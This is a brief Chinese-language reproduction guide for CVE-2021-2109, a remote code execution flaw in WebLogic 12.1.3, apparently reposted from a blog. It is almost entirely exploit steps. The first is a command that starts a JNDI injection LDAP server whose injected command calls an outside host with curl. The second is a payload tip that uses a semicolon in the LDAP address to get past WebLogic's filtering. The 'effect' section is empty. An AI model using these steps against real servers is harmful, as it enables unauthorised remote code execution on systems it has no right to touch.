环境:
Weblogic 12.1.3.0.0
1.开启LDAP服务
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C "curl [Address]:5555"
2.使用Payload
PS:ldap://x.x.x;(分号)x:1389/xxx
3.效果
参考链接:
https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw
CVE-2021-2109 Weblogic远程代码执行漏洞复现
原文:https://www.cnblogs.com/liangzai6/p/14316102.html